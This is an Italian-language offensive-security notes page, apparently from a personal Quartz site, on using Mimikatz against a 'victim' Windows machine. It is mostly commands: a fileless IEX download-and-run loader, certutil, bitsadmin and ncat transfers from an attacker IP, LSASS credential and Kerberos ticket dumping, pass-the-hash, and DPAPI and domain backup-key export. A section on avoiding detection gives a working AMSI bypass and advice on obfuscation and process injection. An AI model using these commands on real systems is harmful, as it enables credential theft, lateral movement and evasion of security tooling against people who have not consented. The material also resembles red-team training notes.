Quartz 4

Mimikatz

2 min read

tags: Mimikatz Estrazione_Credenziali Windows_Estrazione_Credenziali

Questo strumento può essere utilizzato per ottenere credenziali sulla macchina vittima, in genere è meglio farlo dopo aver ottenuto privilegi elevati, è possibile provare anche con privilegi bassi, nelle macchine Windows più recenti è più difficile che abbia successo perchè Windows ha introdotto molte nuove protezioni, ma se mal configurate potrebbe ancora funzionare.

Scaricare Mimikatz sulla macchina vittima

Esecuzione in memoria

Questo è il miglior modo per scaricare ed avviare Mimikatz perchè è molto più difficile da rilevare dai sistemi di difesa rispetto agli altri modi:

 
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1')
 
Invoke-Mimikatz

Ncat

Dal computer attaccante:

ncat -lvp 4444 < mimikatz.exe

Dal computer vittima:

ncat <IP> 4444 > mimikatz.exe

Tramite strumenti Windows

 
certutil -urlcache -split -f http://IP_ATTACCANTE/mimikatz.exe C:\Windows\Temp\mimikatz.exe
 
bitsadmin /transfer job /download /priority normal http://IP_ATTACCANTE/mimi.exe C:\Temp\mimi.exe

Comandi da eseguire sulla macchina

Abilitare privilegi necessari:

privilege::debug

Verifica l’output per vedere se il privilegio è stato ottenuto (“Privilege ‘20’ OK”). Se fallisce, molte delle funzioni successive non funzioneranno. Se restituisce ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061, significa che non hai i permessi di amministratore/SYSTEM.

Estrazione Credenziali dal LSASS

sekurlsa::logonpasswords

Dump di tutti gli hash NTLM:

sekurlsa::msv

Ticket Kerberos (TGT/TGS):

sekurlsa::tickets

Pass-the-Hash (PtH)

sekurlsa::pth /user:Administrator /domain:DOMINIO /ntlm:HASH_NTLM
  • Sostituisci HASH_NTLM con l’hash estratto (es. aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0).
  • Aprirà una nuova finestra cmd.exe con il contesto dell’utente specificato.

Consigli per evitare l’identificazione

  1. In-Memory Execution: Usa Invoke-Mimikatz.ps1 in PowerShell senza scrivere su disco.

  2. Bypass AMSI:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
  1. Process Injection: Inietta Mimikatz in un processo legittimo (es. explorer.exe) con tools come Cobalt Strike.
  2. Obfuscazione:
.\mimikatz.exe "coffee" "sekurlsa::logonpasswords" "exit"  # Easter egg per bypassare firme AV

Recuperare la Master Key del DC

#Questo comando serve a recuperare la Master Key con la password dell'user
 
dpapi::masterkey /in:"C:\Users\spotless.OFFENSE\AppData\Roaming\Microsoft\Protect\ S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /sid:S-1-5-21-2552734371-813931464-1050690807-1106 /password:******* /protected
 
#Questo comando serve a recuperare la Master Key con le credenziali dell'admin
 
sekurlsa::dpapi
 
#Quest comando recupera tutti i backup delle master Key
 
lsadump::backupkeys /system:dc01.offense.local /export

Graph View